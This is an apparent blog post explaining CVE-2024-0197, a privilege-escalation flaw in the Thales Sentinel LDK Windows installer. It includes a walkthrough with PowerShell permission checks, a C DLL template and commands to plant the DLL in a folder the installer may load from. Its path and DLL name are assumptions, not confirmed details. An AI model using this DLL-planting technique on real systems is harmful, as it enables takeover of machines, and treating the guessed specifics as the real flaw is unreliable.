CVE-2024-0197 - How a Flaw in SafeNet Sentinel HASP LDK Installer Lets Attackers Escalate Privileges on Windows

In January 2024, a new vulnerability was publicly disclosed affecting Thales’ SafeNet Sentinel HASP LDK – a widely used digital rights management (DRM) software — specifically, its installer on Windows platforms. Identified as CVE-2024-0197, this flaw exists in all versions prior to 9.16 of the Sentinel LDK installer. If exploited, it allows an attacker with local access to escalate their privilege level – a serious risk, especially on multi-user systems.

In this post, I’ll explain in plain English what this bug is, why it’s dangerous, how it can be exploited, provide relevant links, and show you an example of what an actual attacker might do.

What is Sentinel HASP LDK?

SafeNet Sentinel HASP (now Sentinel LDK) by Thales is software that vendors use to protect their apps and manage licensing, often used with dongle-based or cloud-based license protections. It sits on Windows machines to enforce these licenses, making sure only authorized users and devices can run certain software.

Here’s the official summary from NIST

> "*A flaw was found in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows. An attacker with local access could exploit this flaw during installation to escalate their privilege level.*"

Let’s break that down

- A flaw during installation: Not after the software is running, but while it’s being installed or upgraded.
- Local access needed: This isn’t a remote attack. The attacker needs to be on the target Windows machine.
- Privilege escalation: The attacker can gain higher permissions (for example, get SYSTEM or Administrator rights).

The Root Cause

The vulnerability comes from how the LDK installer handles file system permissions and operations during the setup process.

Specifically:
- The installer, when running as SYSTEM or with administrative rights (which is normal for installers), writes files to directories that may be controlled by low-privilege users.
- Certain actions (like loading a DLL or running a script) might load from a directory with weak permissions, allowing a local attacker to sneak in their own malicious code.

This type of bug is known as "privilege escalation via insecure file permissions or path hijacking."

Example Exploitation Scenario

Let’s say a regular user account is logged in. An administrator (or a process with admin rights) runs the Sentinel HASP LDK installer. If the installer at any point:

Creates a folder in a location like C:\ProgramData\SomeFolder

- Or creates a scheduled task or service with a binary path pointing to a folder writable by regular users,
then a local attacker could replace key files with malicious versions, which the installer (running as SYSTEM) would then execute.

Step-by-Step Exploitation Walkthrough

Suppose you want to exploit a vulnerable version of the installer on a target Windows system where you already have low-level access (normal user account). Here’s what you could do in simple steps:

1. Find a Writable Path

Let’s say the installer writes to or loads from C:\ProgramData\SafeNet Sentinel\.

# Check if folder is writable
Test-Path -Path "C:\ProgramData\SafeNet Sentinel" -PathType Container
(Get-Acl "C:\ProgramData\SafeNet Sentinel").Access

If any entry gives Everyone or Users write access, it’s a big red flag.

2. Prepare Malicious Payload

Let’s assume the installer accepts a DLL in that folder named example.dll. You could make your own malicious DLL to display a message or spawn a SYSTEM shell.

Here’s a simple C DLL template (using C)

// exploit.c
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBox(NULL, TEXT("Exploit Success!"), TEXT("CVE-2024-0197"), MB_OK);
        // Or, for persistence/escalation: spawn an admin shell, etc.
    }
    return TRUE;
}

Compile that with

cl /LD exploit.c

3. Place Payload in Target Path

Copy your malicious DLL into the writable directory BEFORE the admin runs the installer.

Copy-Item -Path ".\exploit.dll" -Destination "C:\ProgramData\SafeNet Sentinel\example.dll"

4. Wait For the Installer to Run

When an admin runs a vulnerable version of the Sentinel HASP LDK installer, your DLL will be loaded as SYSTEM, triggering your code.

5. Get Privileged Access

If your DLL pops a shell, you'll have a SYSTEM-level command prompt, which you can use to take over the machine or install persistent malware.

References and Further Reading

- NIST CVE-2024-0197 entry
- Thales security advisory *(login may be required)*
- Sentinel LDK Release Notes
- SafeNet Sentinel site

Conclusion

CVE-2024-0197 is a classic example of why installer security is critical in Windows environments. Many organizations ignore local privilege escalation bugs, but even if attackers can't get admin directly, once they're on the box, the risk is real.

If you haven’t updated Sentinel LDK yet, do it today.

Want more exclusive security walk-throughs like this? Follow, share, and stay safe!

Timeline

Published on: 02/27/2024 13:15:45 UTC
Last modified on: 02/27/2024 14:19:41 UTC